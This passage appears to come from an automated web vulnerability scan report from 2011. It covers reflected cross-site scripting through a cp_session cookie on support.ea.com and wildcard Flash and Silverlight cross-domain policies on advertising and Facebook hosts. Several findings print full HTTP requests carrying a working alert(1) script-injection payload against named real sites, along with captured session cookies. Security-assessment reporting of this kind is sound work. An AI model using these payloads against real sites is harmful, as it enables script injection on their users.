Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /app/answers/detail/a_id/3628 HTTP/1.1
Host: support.ea.com
Proxy-Connection: keep-alive
Referer: http://support.ea.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CEM-session=50ishjhd22sfunvecnibh6mej7; __utmz=103303007.1308923026.1.1.utmcsr=aboutus.ea.com|utmccn=(referral)|utmcmd=referral|utmcct=/ea_outreach.action; __utma=103303007.346541957.1308923026.1308923026.1308923026.1; __utmc=103303007; __utmb=103303007.1.10.1308923026; s_ria=flash%2010%7Csilverlight%20not%20detected; s_sivo=US%3AEACOM%3ANONE; s_pv=NA%3AUS%3AEA%3ANONE%3AMKT%3ANONE%3AEACOM%3ANONE%3APRODUCTEULAS; s_ppv=7; s_cc=true; cp_session=aUVJ8dT1kyDausb%7Eh_bFiS7qw_UUe4csS3t_7t2XSRu2xT4Rw_utv%7Ed4aiCmSuKJB08Gak%7EHWcm0ISPK9SiD3Q4zt2F7FUcieOWOwbX9de0v5fIS_t8F%7E4WjauP%7EbsABNKlAA44bEVwuaUqqwcE8ZFXvCBwnBx6NHO8mMQtG9g_Dt6EBTeufVzKVUyz5AGdfSCoCY95rAJXfspuz%7EQJa_lGeTy6cVRUd0a_ZKq8IY2cOLSDVM_q8Amt1aPx0KIIPjxEeoR0tvR0UA%2131232"%3balert(1)//5a7be544b54; evar1=Not%20Logged%20In; s_sq=eacustomerservice%3D%2526pid%253DSupport%252520Home%2526pidt%253D1%2526oid%253Dhttp%25253A//support.ea.com/app/answers/detail/a_id/3628%2526ot%253DA%26eaeabrandna%3D%2526pid%253Dhttp%25253A%25252F%25252Finvestors.ea.com%25252F%2526oid%253Dhttp%25253A%25252F%25252Feastore.ea.com%25252F%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:49:07 GMT
Server: Apache
Cache-Control: no-cache
Expires: -1
Pragma: no-cache
Set-Cookie: cp_session=aUDsqYmgYJMhp1hD9nKO0sNeg8BKvlvpEO1Hlt4IFQnl0_Kqb6yTJB2T5Y3FFKMuDpSqD98pb05irCIMWMKOzRXqv3CvKgSsRqfJw2i1PR2UK4CN7%7ExoU5tQ26gWCPzVZ9IBv7E%7Ec8QPwqsjCIEy04gYBBauqjL62FdPznk0JzYuZVxDt2QCbX5FY%7EPN%7E_p7JSPyqa8HHU5xA%21; path=/; httponly
Set-Cookie: accType=deleted; expires=Thu, 24-Jun-2010 13:49:07 GMT
RNT-Time: D=228615 t=1308923347946099
RNT-Machine: 19
Vary: Accept-Encoding
Content-Length: 74319
X-Cnection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en-US" xml:lang="en-US">
<hea
...[SNIP]...
k~HWcm0ISPK9SiD3Q4zt2F7FUcieOWOwbX9de0v5fIS_t8F~4WjauP~bsABNKlAA44bEVwuaUqqwcE8ZFXvCBwnBx6NHO8mMQtG9g_Dt6EBTeufVzKVUyz5AGdfSCoCY95rAJXfspuz~QJa_lGeTy6cVRUd0a_ZKq8IY2cOLSDVM_q8Amt1aPx0KIIPjxEeoR0tvR0UA!31232";alert(1)//5a7be544b54";
s.prop11="";
s.prop6 = "";
s.prop7 = "";
s.prop8 = "";
s.prop12 = "";
s.prop13 = "";
s.prop16 = "";
s.prop17 = "";
var theBody=document.body;
if (theBody && document.body.addBehavior)
theBody.addBe
...[SNIP]...
4.165. http://support.ea.com/app/answers/detail/a_id/4394 [cp_session cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://support.ea.com
Path:   /app/answers/detail/a_id/4394

Issue detail

The value of the cp_session cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 65dda"%3balert(1)//5e371188cf5 was submitted in the cp_session cookie. This input was echoed as 65dda";alert(1)//5e371188cf5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /app/answers/detail/a_id/4394 HTTP/1.1
Host: support.ea.com
Proxy-Connection: keep-alive
Referer: http://support.ea.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CEM-session=50ishjhd22sfunvecnibh6mej7; __utmz=103303007.1308923026.1.1.utmcsr=aboutus.ea.com|utmccn=(referral)|utmcmd=referral|utmcct=/ea_outreach.action; __utma=103303007.346541957.1308923026.1308923026.1308923026.1; __utmc=103303007; __utmb=103303007.1.10.1308923026; s_ria=flash%2010%7Csilverlight%20not%20detected; s_sivo=US%3AEACOM%3ANONE; s_pv=NA%3AUS%3AEA%3ANONE%3AMKT%3ANONE%3AEACOM%3ANONE%3APRODUCTEULAS; s_ppv=7; s_cc=true; cp_session=aUVJ8dT1kyDausb%7Eh_bFiS7qw_UUe4csS3t_7t2XSRu2xT4Rw_utv%7Ed4aiCmSuKJB08Gak%7EHWcm0ISPK9SiD3Q4zt2F7FUcieOWOwbX9de0v5fIS_t8F%7E4WjauP%7EbsABNKlAA44bEVwuaUqqwcE8ZFXvCBwnBx6NHO8mMQtG9g_Dt6EBTeufVzKVUyz5AGdfSCoCY95rAJXfspuz%7EQJa_lGeTy6cVRUd0a_ZKq8IY2cOLSDVM_q8Amt1aPx0KIIPjxEeoR0tvR0UA%2165dda"%3balert(1)//5e371188cf5; evar1=Not%20Logged%20In; s_sq=eacustomerservice%3D%2526pid%253DSupport%252520Home%2526pidt%253D1%2526oid%253Dhttp%25253A//support.ea.com/app/answers/detail/a_id/4394%2526ot%253DA%26eaeabrandna%3D%2526pid%253Dhttp%25253A%25252F%25252Finvestors.ea.com%25252F%2526oid%253Dhttp%25253A%25252F%25252Feastore.ea.com%25252F%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:49:10 GMT
Server: Apache
Cache-Control: no-cache
Expires: -1
Pragma: no-cache
Set-Cookie: cp_session=aU43fR4BA0ZZHLei9yTMdQgMwlKsgEIfAz%7EHxOHekrQ2b6%7EJihCKHi0iV32rZ%7E9e8ugrsLn1xUe8AtsjYMTvSo2aJTQ9pjjZJOx7FxT48zcSBv6I5ZC_GV9veZsIKxwUtB11gkquTHXSu_ZXHHscdGsIA0c03Y9RnG4ogkmvfpY3MC0fdTbw0toXcQihKh90VBov8jksOXsEQ%21; path=/; httponly
Set-Cookie: accType=deleted; expires=Thu, 24-Jun-2010 13:49:09 GMT
RNT-Time: D=264065 t=1308923350670541
RNT-Machine: 12
Vary: Accept-Encoding
Content-Length: 83870
X-Cnection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en-US" xml:lang="en-US">
<hea
...[SNIP]...
k~HWcm0ISPK9SiD3Q4zt2F7FUcieOWOwbX9de0v5fIS_t8F~4WjauP~bsABNKlAA44bEVwuaUqqwcE8ZFXvCBwnBx6NHO8mMQtG9g_Dt6EBTeufVzKVUyz5AGdfSCoCY95rAJXfspuz~QJa_lGeTy6cVRUd0a_ZKq8IY2cOLSDVM_q8Amt1aPx0KIIPjxEeoR0tvR0UA!65dda";alert(1)//5e371188cf5";
s.prop11="";
s.prop6 = "";
s.prop7 = "";
s.prop8 = "";
s.prop12 = "";
s.prop13 = "";
s.prop16 = "";
s.prop17 = "";
var theBody=document.body;
if (theBody && document.body.addBehavior)
theBody.addBe
...[SNIP]...
5. Flash cross-domain policy  previous  next
There are 15 instances of this issue:

Issue background

The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Flash cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.

5.1. http://a.netmng.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.netmng.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: a.netmng.com

Response

HTTP/1.1 200 OK
Date: Sat, 25 Jun 2011 02:10:59 GMT
Server: Apache/2.2.9
Last-Modified: Fri, 07 May 2010 14:42:29 GMT
ETag: "6c1d1-6a-4860211879f40"
Accept-Ranges: bytes
Content-Length: 106
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
5.2. http://ad.doubleclick.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 258
Last-Modified: Thu, 18 Sep 2003 21:42:14 GMT
Date: Fri, 24 Jun 2011 13:22:40 GMT

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.doubleclick.net -->
<cross-domain-policy>

...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...
5.3. http://d.adroll.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d.adroll.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: d.adroll.com

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Fri, 24 Jun 2011 13:20:42 GMT
Content-Type: text/xml
Content-Length: 201
Last-Modified: Thu, 09 Jun 2011 00:14:49 GMT
Connection: close
Accept-Ranges: bytes

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
...[SNIP]...
5.4. http://d1.openx.org/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d1.openx.org
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: d1.openx.org

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:20:36 GMT
Server: Apache
Last-Modified: Tue, 31 Aug 2010 01:04:36 GMT
ETag: "464005-c7-48f142a249100"
Accept-Ranges: bytes
Content-Length: 199
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*" />
</cross-domain-policy>
5.5. http://fls.doubleclick.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://fls.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: fls.doubleclick.net

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy
Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT
Date: Thu, 23 Jun 2011 20:45:52 GMT
Expires: Tue, 17 May 2011 18:17:24 GMT
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Age: 60179
Cache-Control: public, max-age=86400

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.doubleclick.net -->
<cross-domain-policy>
<site-
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...
5.6. http://ib.adnxs.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ib.adnxs.com

Response

HTTP/1.0 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Sat, 25-Jun-2011 13:18:33 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=3420415245200633085; path=/; expires=Thu, 22-Sep-2011 13:18:33 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/xml

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><site-control permitted-cross-domain-policies="master-only"
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...
5.7. http://idcs.interclick.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://idcs.interclick.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: idcs.interclick.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Thu, 23 Jun 2011 03:34:28 GMT
Accept-Ranges: bytes
ETag: "f5f224755631cc1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
P3P: policyref="http://www.interclick.com/w3c/p3p.xml",CP="NON DSP ADM DEV PSD OUR IND PRE NAV UNI"
Date: Sat, 25 Jun 2011 02:14:00 GMT
Connection: close
Content-Length: 225

...<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...
5.8. http://m.adnxs.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://m.adnxs.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: m.adnxs.com

Response

HTTP/1.0 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Sat, 25-Jun-2011 13:18:55 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=3420415245200633085; path=/; expires=Thu, 22-Sep-2011 13:18:55 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/xml

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><site-control permitted-cross-domain-policies="master-only"
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...
5.9. http://rcci.122.2o7.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://rcci.122.2o7.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: rcci.122.2o7.net

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:29:05 GMT
Server: Omniture DC/2.0.0
xserver: www430
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>
5.10. http://segment-pixel.invitemedia.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://segment-pixel.invitemedia.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: segment-pixel.invitemedia.com

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Fri, 24 Jun 2011 13:18:32 GMT
Content-Type: text/plain
Content-Length: 81

<cross-domain-policy>
   <allow-access-from domain="*"/>
</cross-domain-policy>
5.11. http://swsoft.122.2o7.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://swsoft.122.2o7.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: swsoft.122.2o7.net

Response

HTTP/1.1 200 OK
Date: Sat, 25 Jun 2011 02:11:01 GMT
Server: Omniture DC/2.0.0
xserver: www265
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>
5.12. http://wotifcom.112.2o7.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wotifcom.112.2o7.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: wotifcom.112.2o7.net

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:20:41 GMT
Server: Omniture DC/2.0.0
xserver: www609
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>
5.13. http://googleads.g.doubleclick.net/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: googleads.g.doubleclick.net

Response

HTTP/1.0 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/x-cross-domain-policy; charset=UTF-8
Last-Modified: Fri, 27 May 2011 17:28:41 GMT
Date: Thu, 23 Jun 2011 15:24:40 GMT
Expires: Fri, 24 Jun 2011 15:24:40 GMT
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block
Age: 78835
Cache-Control: public, max-age=86400

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="maps.gstatic.com" />
<allow-access-from domain="maps.gstatic.cn" />
<allow-access-from domain="*.googlesyndication.com" />
<allow-access-from domain="*.google.com" />
<allow-access-from domain="*.google.ae" />
<allow-access-from domain="*.google.at" />
<allow-access-from domain="*.google.be" />
<allow-access-from domain="*.google.ca" />
<allow-access-from domain="*.google.ch" />
<allow-access-from domain="*.google.cn" />
<allow-access-from domain="*.google.co.il" />
<allow-access-from domain="*.google.co.in" />
<allow-access-from domain="*.google.co.jp" />
<allow-access-from domain="*.google.co.kr" />
<allow-access-from domain="*.google.co.nz" />
<allow-access-from domain="*.google.co.uk" />
<allow-access-from domain="*.google.co.ve" />
<allow-access-from domain="*.google.co.za" />
<allow-access-from domain="*.google.com.ar" />
<allow-access-from domain="*.google.com.au" />
<allow-access-from domain="*.google.com.br" />
<allow-access-from domain="*.google.com.gr" />
<allow-access-from domain="*.google.com.hk" />
<allow-access-from domain="*.google.com.ly" />
<allow-access-from domain="*.google.com.mx" />
<allow-access-from domain="*.google.com.my" />
<allow-access-from domain="*.google.com.pe" />
<allow-access-from domain="*.google.com.ph" />
<allow-access-from domain="*.google.com.pk" />
<allow-access-from domain="*.google.com.ru" />
<allow-access-from domain="*.google.com.sg" />
<allow-access-from domain="*.google.com.tr" />
<allow-access-from domain="*.google.com.tw" />
<allow-access-from domain="*.google.com.ua" />
<allow-access-from domain="*.google.com.vn" />
<allow-access-from domain="*.google.de" />
<allow-access-from domain="*.google.dk" />
<allow-access-from domain="*.google.es" />
<allow-access-from domain="*.google.fi" />
<allow-access-from domain="*.google.fr" />
<allow-access-from domain="*.google.it" />
<allow-access-from domain="*.google.lt" />
<allow-access-from domain="*.google.lv" />
<allow-access-from domain="*.google.nl" />
<allow-access-from domain="*.google.no" />
<allow-access-from domain="*.google.pl" />
<allow-access-from domain="*.google.pt" />
<allow-access-from domain="*.google.ro" />
<allow-access-from domain="*.google.se" />
<allow-access-from domain="*.google.sk" />
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="*.ytimg.com" />
<allow-access-from domain="*.2mdn.net" />
<allow-access-from domain="*.doubleclick.net" />
<allow-access-from domain="*.doubleclick.com" />
...[SNIP]...
5.14. http://static.ak.fbcdn.net/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: static.ak.fbcdn.net

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy;charset=utf-8
X-FB-Server: 10.30.147.195
X-Cnection: close
Date: Fri, 24 Jun 2011 13:20:40 GMT
Content-Length: 1527
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only" /
...[SNIP]...
<allow-access-from domain="s-static.facebook.com" />
   <allow-access-from domain="static.facebook.com" />
   <allow-access-from domain="static.api.ak.facebook.com" />
   <allow-access-from domain="*.static.ak.facebook.com" />
   <allow-access-from domain="s-static.thefacebook.com" />
   <allow-access-from domain="static.thefacebook.com" />
   <allow-access-from domain="static.api.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.fbcdn.com" />
   <allow-access-from domain="s-static.ak.fbcdn.net" />
   <allow-access-from domain="*.static.ak.fbcdn.net" />
   <allow-access-from domain="s-static.ak.facebook.com" />
   <allow-access-from domain="www.facebook.com" />
   <allow-access-from domain="www.new.facebook.com" />
   <allow-access-from domain="register.facebook.com" />
   <allow-access-from domain="login.facebook.com" />
   <allow-access-from domain="ssl.facebook.com" />
   <allow-access-from domain="secure.facebook.com" />
   <allow-access-from domain="ssl.new.facebook.com" />
...[SNIP]...
<allow-access-from domain="fvr.facebook.com" />
   <allow-access-from domain="www.latest.facebook.com" />
   <allow-access-from domain="www.inyour.facebook.com" />
   <allow-access-from domain="www.beta.facebook.com" />
...[SNIP]...
5.15. http://www.facebook.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.facebook.com

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy;charset=utf-8
X-FB-Server: 10.55.26.60
Connection: close
Content-Length: 1527

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only" /
...[SNIP]...
<allow-access-from domain="s-static.facebook.com" />
   <allow-access-from domain="static.facebook.com" />
   <allow-access-from domain="static.api.ak.facebook.com" />
   <allow-access-from domain="*.static.ak.facebook.com" />
   <allow-access-from domain="s-static.thefacebook.com" />
   <allow-access-from domain="static.thefacebook.com" />
   <allow-access-from domain="static.api.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.fbcdn.com" />
   <allow-access-from domain="s-static.ak.fbcdn.net" />
   <allow-access-from domain="*.static.ak.fbcdn.net" />
   <allow-access-from domain="s-static.ak.facebook.com" />
...[SNIP]...
<allow-access-from domain="www.new.facebook.com" />
   <allow-access-from domain="register.facebook.com" />
   <allow-access-from domain="login.facebook.com" />
   <allow-access-from domain="ssl.facebook.com" />
   <allow-access-from domain="secure.facebook.com" />
   <allow-access-from domain="ssl.new.facebook.com" />
   <allow-access-from domain="static.ak.fbcdn.net" />
   <allow-access-from domain="fvr.facebook.com" />
   <allow-access-from domain="www.latest.facebook.com" />
   <allow-access-from domain="www.inyour.facebook.com" />
   <allow-access-from domain="www.beta.facebook.com" />
...[SNIP]...
6. Silverlight cross-domain policy  previous  next
There are 4 instances of this issue:

Issue background

The Silverlight cross-domain policy controls whether Silverlight client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Silverlight cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.

6.1. http://ad.doubleclick.net/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
